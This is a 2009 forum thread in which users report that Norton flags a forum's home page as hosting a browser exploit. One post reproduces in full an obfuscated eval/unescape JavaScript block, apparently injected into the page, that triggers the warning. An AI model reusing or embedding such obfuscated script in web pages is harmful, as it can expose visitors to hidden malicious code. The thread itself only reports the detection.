1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Security Warnings From Norton Finally Stopped

Discussion in 'Forum Suggestions & Feedback' started by ronnymundster, Oct 19, 2009.

  1. ronnymundster

    ronnymundster Newbie

    Joined:
    May 4, 2009
    Messages:
    22
    Likes Received:
    7
    This is my first visit to Blackhatworld in a while that wasn't blocked by Norton Internet Security 2010 in some way. Every visit to the home page for the past couple of weeks warned about an HTTP toolkit variant of some kind. Anyway, I am glad whatever was causing the warning has finally stopped.
     
  2. Fulano

    Fulano Registered Member

    Joined:
    Jul 29, 2007
    Messages:
    85
    Likes Received:
    36
    Sorry to resurrect this thread. I am still having this issue and for the last 6 months I have been unable to access the main page of BHW because of the security warnings from Norton Internet Security.

    I know Norton is not regarded as the best antivirus around here but it is all I got and even when I plan to buy Kaspersky, I got quite a few months left in my Norton subscription. Also, whatever crap Norton is, it is used by quite a lot of people and having a red warning triggering the first time they visit BHW is surely going to scare them away.

    I have visited other vBulletin forums with a CMS portal and this is the only one which triggers that warning.

    Anyway, I went through the trouble of saving the main page of BHW on another computer and then removing pieces of the HTML until Norton stopped giving the warning. At the end it came down to this:

    Code:
    <script type="text/javascript">
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\b\'+e(c)+\'\\b\',\'g\'),k[c])}}return p}(\'n(m("%b%l%e%1%j%7%k%i%o%u%p%s%i%7%r%h%2%1%0%0%6%e%2%1%0%0%3%a%2%1%0%0%3%3%2%1%0%0%4%5%2%1%0%0%3%d%2%1%0%0%3%b%2%1%0%0%3%9%2%1%0%0%5%0%2%1%0%0%4%6%2%1%0%0%4%5%2%1%0%0%3%6%2%1%0%0%6%b%2%1%0%0%3%f%2%1%0%0%4%c%2%1%0%0%4%c%2%1%0%0%4%0%2%1%0%0%6%g%2%1%0%0%5%8%2%1%0%0%5%8%2%1%0%0%3%4%2%1%0%0%3%8%2%1%0%0%3%8%2%1%0%0%3%4%2%1%0%0%3%e%2%1%0%0%3%9%2%1%0%0%5%b%2%1%0%0%3%d%2%1%0%0%3%7%2%1%0%0%3%d%2%1%0%0%3%e%2%1%0%0%4%a%2%1%0%0%4%g%2%1%0%0%3%9%2%1%0%0%5%7%2%1%0%0%3%6%2%1%0%0%3%8%2%1%0%0%3%b%2%1%0%0%5%8%2%1%0%0%3%6%2%1%0%0%3%8%2%1%0%0%4%9%2%1%0%0%3%7%2%1%0%0%4%c%2%1%0%0%3%9%2%1%0%0%4%5%2%1%0%0%5%8%2%1%0%0%3%a%2%1%0%0%3%7%2%1%0%0%3%c%2%1%0%0%3%9%2%1%0%0%4%f%2%1%0%0%5%7%2%1%0%0%4%0%2%1%0%0%3%f%2%1%0%0%4%0%2%1%0%0%5%0%2%1%0%0%4%4%2%1%0%0%3%a%2%1%0%0%3%c%2%1%0%0%4%c%2%1%0%0%3%f%2%1%0%0%6%b%2%1%0%0%6%d%2%1%0%0%5%0%2%1%0%0%3%f%2%1%0%0%3%9%2%1%0%0%3%a%2%1%0%0%3%4%2%1%0%0%3%f%2%1%0%0%4%c%2%1%0%0%6%b%2%1%0%0%6%d%2%1%0%0%5%0%2%1%0%0%4%6%2%1%0%0%4%c%2%1%0%0%4%a%2%1%0%0%3%e%2%1%0%0%3%9%2%1%0%0%6%b%2%1%0%0%5%5%2%1%0%0%3%c%2%1%0%0%3%a%2%1%0%0%4%6%2%1%0%0%4%0%2%1%0%0%3%e%2%1%0%0%3%d%2%1%0%0%4%a%2%1%0%0%6%g%2%1%0%0%3%7%2%1%0%0%3%8%2%1%0%0%3%7%2%1%0%0%3%9%2%1%0%0%5%5%2%1%0%0%6%7%2%1%0%0%6%e%2%1%0%0%5%8%2%1%0%0%3%a%2%1%0%0%3%3%2%1%0%0%4%5%2%1%0%0%3%d%2%1%0%0%3%b%2%1%0%0%3%9%2%1%0%0%6%7%h%q%t"));\',31,31,\'30|75|5C|36|37|32|33|65|66|35|39|64|34|31|63|38|61|27|74|6D|6E|6F|unescape|eval|2E|72|29|28|69|3B|77\'.split(\'|\'),0,{}));
    </script>
    
    I have no idea what the above code does but it is present two times: around line 716 and line 894.

    I hope the admins see this post and perhaps decide to change the code around to avoid the false positives.
     
  3. Fulano

    Fulano Registered Member

    Joined:
    Jul 29, 2007
    Messages:
    85
    Likes Received:
    36
    Thank you Admins and Mods!! It seems the code was removed and I can once again browse the main page of BHW and stay on top of the latest posts and news!

    /cheers

    Edit: crap. I spoke too soon. The code is back and once again I can't open the main page :(
     
    Last edited: Nov 15, 2009
  4. ronnymundster

    ronnymundster Newbie

    Joined:
    May 4, 2009
    Messages:
    22
    Likes Received:
    7
    Norton is again reporting a browser exploit for me too.
     
  5. kaidoristm

    kaidoristm Power Member

    Joined:
    Feb 13, 2009
    Messages:
    561
    Likes Received:
    726
    Occupation:
    Freelancer
    Location:
    Estonia
    Home Page:
    Remove it Norton is fucking virus himself. Grab kaspersky :)
     
  6. im n0t lurer

    im n0t lurer Regular Member

    Joined:
    Jun 29, 2009
    Messages:
    229
    Likes Received:
    54
    still doesn't work for me ;)
     
  7. Fulano

    Fulano Registered Member

    Joined:
    Jul 29, 2007
    Messages:
    85
    Likes Received:
    36
    Not an option, I already paid 1 full year of Norton. I will switch to something else next time it expires.